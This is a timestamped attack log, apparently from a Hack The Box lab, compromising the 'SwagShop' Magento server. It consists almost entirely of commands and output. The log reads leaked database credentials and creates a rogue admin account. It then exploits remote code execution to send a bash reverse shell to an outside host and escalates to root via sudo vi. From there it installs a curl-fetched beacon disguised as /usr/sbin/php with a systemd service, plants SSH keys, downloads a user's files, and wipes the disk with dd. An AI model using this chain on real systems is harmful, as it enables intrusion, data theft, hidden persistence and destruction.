12025-04-06T06:56:22-04:00
2
3sudo apt install -y nmap curl python3-venv make zip unzip
4sudo openvpn --config htb.ovpn
5
6### T1 10.129.232.125
7
8ping -c 1 10.129.232.125
9nmap -sV -T4 10.129.232.125
10
11PORT STATE SERVICE VERSION
1222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
1380/tcp open http Apache httpd 2.4.29 ((Ubuntu))
14
15up, ports open
16
17Magento software
1810.129.232.125 swagshop.htb
19curl -L http://swagshop.htb/app/etc/local.xml
20
21
22python3 cli.py repl
23set --target 10.129.232.125
24
25 🏁 Done! Here's what we found:
26 Install Date: Wed, 08 May 2019 07:23:09 +0000
27 Hostname: localhost
28 Username: root
29 Password: fMVWh7bDHpgZkyfqQXreTjU9
30 Database Name: swagshop
31 Crypt Key: b355a9e0cd018d3f7f03607141518419
32
33python3 poc.py http://swagshop.htb
34create-user --username ypwq --password 123
35
36 🛶 Attempting to create a new user with the following creds:
37 username: ypwq
38 password: 123
39 🏁 Worked! Check 10.129.232.125/admin with creds ypwq:123
40 👉 Set username to ypwq and password to 123
41
422025-04-06T07:05:09-04:00
43
44python3 -m venv venv
45source venv/bin/activate
46python3 -m pip install mechanize
47nc -l -p 4444
48python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.153/443 0>&1'"
492025-04-06T07:28:47-04:00
50
51sudo -l
52Matching Defaults entries for www-data on swagshop:
53 env_reset, mail_badpass,
54 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
55
56User www-data may run the following commands on swagshop:
57 (root) NOPASSWD: /usr/bin/vi /var/www/html/*
58
59sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
60uid=0(root) gid=0(root) groups=0(root)
612025-04-06T07:29:51-04:00
62
63generate beacon --http http://10.10.16.153:4444 --seconds 20 --os linux
64http --lport 4444
65
66curl -s -L http://10.10.16.153:8080/php -o /usr/sbin/php
67chmod +x /usr/sbin/php
68/usr/sbin/php
692025-04-06T07:38:36-04:00
70
71root_rsa.pub
72ssh-rsa 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
73
74mkdir /root/.ssh/
75upload /home/user/swag/2025-04-06/out/root_rsa.pub /root/.ssh/authorized_keys
76chmod /root/.ssh/authorized_keys 0400
77
78cat /etc/ssh/sshd_config
79#PermitRootLogin prohibit-password
80
81ssh -vvv root@10.129.232.125 -i out/root_rsa -T /bin/bash
822025-04-06T07:44:04-04:00
83
84mv /tmp/.php /usr/sbin/php
85
86php service
87 [Unit]
88 Description=php service
89 After=network.target
90
91 [Service]
92 Type=simple
93 Restart=always
94 RestartSec=1
95 ExecStart=/usr/sbin/php
96
97 [Install]
98 WantedBy=multi-user.target
99
100upload -o /home/user/swag/2025-04-06/out/php.service /lib/systemd/system/php.service
101execute systemctl daemon-reload
102execute systemctl enable php.service
103execute systemctl start php.service
1042025-04-06T07:48:54-04:00
105
106find
107download /home/haris/ -r
108
109/bin/dd if=/dev/zero of=/dev/mapper/swagshop--vg-root
110 2641 2415 root x86_64 /bin/dd
1112025-04-06T08:06:25-04:00
112
113terminate -F 1
1142025-04-06T08:12:04-04:00
115
116all processes and services non-responsive
1172025-04-06T08:20:52-04:00